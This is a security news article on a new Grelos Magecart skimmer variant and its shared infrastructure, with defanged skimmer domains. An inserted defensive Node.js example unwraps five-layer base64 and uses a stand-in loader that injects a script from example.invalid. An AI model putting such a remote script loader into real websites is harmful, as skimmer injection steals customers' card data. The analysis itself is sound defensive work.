A new version of Grelos, a skimmer used in Magecart card-skimming campaigns, shows how overlapping and intertwined infrastructure creates a "murkiness" that makes it harder for security researchers to attribute activity to separate Magecart groups.
The Grelos skimmer first appeared in 2015 and was previously linked to Magecart Group 1-2; however, it has also been observed in attacks by other threat actors. The latest Grelos version detailed by RiskIQ contains "a rehash" of the original code first seen in 2015-16, consisting of a loader and a skimmer, "both of which are base64 encoded five times over."
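A loader wrapped in several layers of base64 is trivial to unwrap once you automate it, and the nesting depth is itself a useful fingerprint when comparing samples. The following is an added example, not Grelos code and not RiskIQ's tooling: it wraps a harmless, constructed stand-in for a loader script in five layers of base64 and then peels the layers off until the content stops looking like base64, reporting how many layers it removed. The script text, the `example.invalid` hostname and the layer cap are assumptions for illustration; it runs under Node.js.

```javascript
// Added example (not Grelos code): unwrap a payload that has been base64 encoded
// several times over, stopping when the decoded layer is no longer base64.

// Strict base64: groups of four alphabet characters, optional final padding.
const STRICT_B64 = /^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?$/;

// Heuristic stop condition: a decoded layer counts as text only if every byte is
// printable ASCII or whitespace. Binary garbage means we decoded something that
// merely looked like base64, so the previous layer was the real payload.
function isPrintable(buf) {
  for (const b of buf) {
    const ok = b === 0x09 || b === 0x0a || b === 0x0d || (b >= 0x20 && b <= 0x7e);
    if (!ok) return false;
  }
  return true;
}

// Decode exactly one layer, or return null if the input is not a plausible layer.
function peelOnce(s) {
  const t = s.trim();
  if (t.length === 0 || t.length % 4 !== 0 || !STRICT_B64.test(t)) return null;
  const buf = Buffer.from(t, "base64");
  if (!isPrintable(buf)) return null;
  return buf.toString("latin1");
}

// Peel repeatedly. maxLayers (assumed value) guards against pathological input
// that keeps decoding to printable text forever.
function unwrapBase64(s, maxLayers = 16) {
  let current = s;
  let layers = 0;
  while (layers < maxLayers) {
    const next = peelOnce(current);
    if (next === null) break;
    current = next;
    layers++;
  }
  return { payload: current, layers };
}

// Helper used only to build the constructed sample below.
function wrapBase64(s, times) {
  let out = s;
  for (let i = 0; i < times; i++) out = Buffer.from(out, "latin1").toString("base64");
  return out;
}

// Constructed sample: a benign script-loader stand-in (hostname is an assumption),
// wrapped five times to mirror the "base64 encoded five times over" description.
const SAMPLE_INNER =
  "var s=document.createElement('script');s.src='https://example.invalid/loader.js';document.head.appendChild(s);";
const SAMPLE_WRAPPED = wrapBase64(SAMPLE_INNER, 5);

const result = unwrapBase64(SAMPLE_WRAPPED);
console.log(`peeled ${result.layers} layer(s):\n${result.payload}`);
```

The printable-text check is what makes the loop terminate on real samples: the innermost JavaScript contains quotes, parentheses and mid-string `=` characters that fail the strict base64 pattern, so the unwrapper stops there rather than mangling the script into binary. When triaging a live sample, compare the final payload and the layer count across domains; the same depth and the same decoded loader on unrelated hosts is the kind of code reuse the article describes.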
The new variant was uncovered while investigating domains associated with a recent attack on boom! Mobile's website, in which the Full(z) House group injected a skimmer into the site to steal customer data. The domains used in that campaign led the researchers to a cookie and associated skimmer domains, including facebookapimanager[.]com and googleapimanager[.]com. Closer inspection, however, showed that the samples hosted there were a recent variant of the Grelos skimmer, not the Full(z) House malware.
"In several recent Magecart compromises, we have seen increasing overlaps in infrastructure used to host various skimmers that are unrelated in terms of the techniques and code structures they employ," said RiskIQ. "We also observe new variants of skimmers reusing code seen over the last several years."
Different skimmer variants linked to Grelos have been "using the same infrastructure or other connections through WHOIS records and other malicious activities, such as phishing and malware during this investigation," the researchers said.